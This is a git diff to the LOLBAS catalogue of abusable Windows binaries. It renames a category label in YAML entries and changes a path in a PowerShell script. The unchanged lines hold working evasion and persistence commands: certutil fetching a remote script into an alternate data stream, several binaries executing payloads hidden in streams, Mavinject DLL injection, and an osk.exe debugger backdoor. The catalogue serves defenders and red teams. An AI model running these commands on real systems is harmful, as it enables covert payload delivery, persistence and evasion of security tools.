diff --git a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 index d4657fa..e030eb6 100644 --- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 +++ b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 @@ -3,7 +3,10 @@ #Author: Oddvar Moe #If you can use it, be my guest! -$mainpath = "C:\data\gitprojects\LOLBAS" +# Install-Module powershell-yaml +# import-module powershell-yaml + +$mainpath = "C:\LOLBAS" function Convert-YamlToMD diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index dbc58da..3e58b92 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -7,7 +7,7 @@ Commands: - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 4a1b4a9..276fe0a 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -15,7 +15,7 @@ Commands: - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt Description: Download and save a PS1 file to an Alternate Data Stream (ADS). Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index f22db61..155fc98 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -7,7 +7,7 @@ Commands: - Command: control.exe c:\windows\tasks\file.txt:evil.dll Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1196 MitreLink: https://attack.mitre.org/wiki/Technique/T1196 diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index a00b7e3..5ee0143 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -7,7 +7,7 @@ Commands: - Command: cscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index bc3938d..e61c99c 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -15,7 +15,7 @@ Commands: - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 @@ -23,7 +23,7 @@ Commands: - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. Usecase: Extract hidden file within alternate data streams - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 @@ -31,7 +31,7 @@ Commands: - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index fc2a4d5..42fcf2a 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -23,7 +23,7 @@ Commands: - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat Description: Copies source file to destination Alternate Data Stream (ADS) Usecase: Copies files from A to B - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 42f8bc9..9f2552c 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -7,7 +7,7 @@ Commands: - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 @@ -15,7 +15,7 @@ Commands: - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index e8731af..f44b00a 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -7,7 +7,7 @@ Commands: - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Usecase: Add a file to an alternate data stream to hide from defensive counter measures - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 @@ -15,7 +15,7 @@ Commands: - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 81dbe0c..2e3abb8 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -15,7 +15,7 @@ Commands: - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 5f73075..9fb67b5 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -7,7 +7,7 @@ Commands: - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index 012df46..09bc4e8 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -15,7 +15,7 @@ Commands: - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 9cb16a9..9790a47 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -31,7 +31,7 @@ Commands: - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1170 MitreLink: https://attack.mitre.org/wiki/Technique/T1170 diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index 84be934..6535861 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -7,7 +7,7 @@ Commands: - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 28e46d0..57c46f2 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -7,7 +7,7 @@ Commands: - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. Usecase: Hide/plant registry information in Alternate data stream for later use - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index eb3f1d2..a410cda 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -7,7 +7,7 @@ Commands: - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Description: Export the target Registry key to the specified .REG file. Usecase: Hide registry data in alternate data stream - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 @@ -15,7 +15,7 @@ Commands: - Command: regedit C:\ads\file.txt:regfile.reg" Description: Import the target .REG file into the Registry. Usecase: Import hidden registry data from alternate data stream - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 3778572..b924953 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -7,7 +7,7 @@ Commands: - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice Description: Creates a new service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 0316208..133e753 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -7,7 +7,7 @@ Commands: - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS) Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 @@ -20,7 +20,7 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"' + - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures Category: Execute diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index 144d221..8fcb842 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -7,7 +7,7 @@ Commands: - Command: wscript c:\ads\file.txt:script.vbs Description: Execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures - Category: Alternate data streams + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096